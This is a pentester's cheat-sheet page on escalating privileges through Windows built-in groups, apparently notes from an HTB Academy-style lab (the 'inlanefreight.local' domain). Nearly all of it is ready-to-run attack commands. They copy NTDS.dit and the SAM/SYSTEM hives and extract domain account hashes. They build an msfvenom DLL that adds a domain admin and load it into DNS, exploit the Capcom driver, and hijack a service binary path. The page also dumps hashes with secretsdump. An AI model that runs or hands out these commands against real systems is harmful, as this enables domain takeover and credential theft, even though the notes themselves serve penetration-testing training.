Windows Group Privileges

Backup Operators

Membership of this group grants its members the SeBackup and SeRestore privileges.

https://github.com/giuliano108/SeBackupPrivilege

1 Import DLLs

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

2 Enable SebackupPrivilege

# Enable
Set-SeBackupPrivilege

# Verufy
Get-SeBackupPrivilege

3 Copy File

copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt

Copy NTDS.dit

diskshadow.exe

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit

Backup SAM + SYSTEM Hives

reg save HKLM\SYSTEM SYSTEM.SAV

reg save HKLM\SAM SAM.SAV

Extract NTDS

Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key

Event Log Reader

Check Membership Group

net localgroup "Event Log Readers"

Searching Security Logs

# Without Credentials
wevtutil qe Security /rd:true /f:text | Select-String "/user"

# With Credentials
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

DnsAdmins

1 Generating Malicious DLL

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

2 Load DLL

dnscmd.exe /config /serverlevelplugindll adduser.dll

3 Restart Service

sc stop dns
sc start dns

Print Operators

Print Operators is another highly privileged group, which grants its members the SeLoadDriverPrivilege, rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down.

https://raw.githubusercontent.com/3gstudent/Homework-of-C-Language/master/EnableSeLoadDriverPrivilege.cpp

1 Compile CPP File

cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp

2 Add Capcop.sys

reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"

reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1

3 Verify Privilege Enables

EnableSeLoadDriverPrivilege.exe

4 Run Exploit

https://github.com/tandasat/ExploitCapcom

.\ExploitCapcom.exe

Server Operators

Allows members to administer Windows servers without needing assignment of Domain Admin privileges. It is a very highly privileged group that can log in locally to servers, including Domain Controllers.

1 Query Service

# Check if it's SYSTEM
sc qc AppReadiness

2 Service Permissions Check

https://learn.microsoft.com/en-us/sysinternals/downloads/psservice

c:\Tools\PsService.exe security AppReadiness

3 Modify Service Binary Path

sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"

4 Start / Stop Service

sc stop AppReadiness
sc start AppReadiness

5 Dump Hashes

secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator

PreviousWindows User Privileges NextManual Enumeration

Last updated 1 year ago

hashtagBackup Operators

hashtag1 Import DLLs

hashtag2 Enable SebackupPrivilege

hashtag3 Copy File

hashtagCopy NTDS.dit

hashtagBackup SAM + SYSTEM Hives

hashtagExtract NTDS

hashtagEvent Log Reader

hashtagCheck Membership Group

hashtagSearching Security Logs

hashtagDnsAdmins

hashtag1 Generating Malicious DLL

hashtag2 Load DLL

hashtag3 Restart Service

hashtagPrint Operators

hashtag1 Compile CPP File

hashtag2 Add Capcop.sys

hashtag3 Verify Privilege Enables

hashtag4 Run Exploit

hashtagServer Operators

hashtag1 Query Service

hashtag2 Service Permissions Check

hashtag3 Modify Service Binary Path

hashtag4 Start / Stop Service

hashtag5 Dump Hashes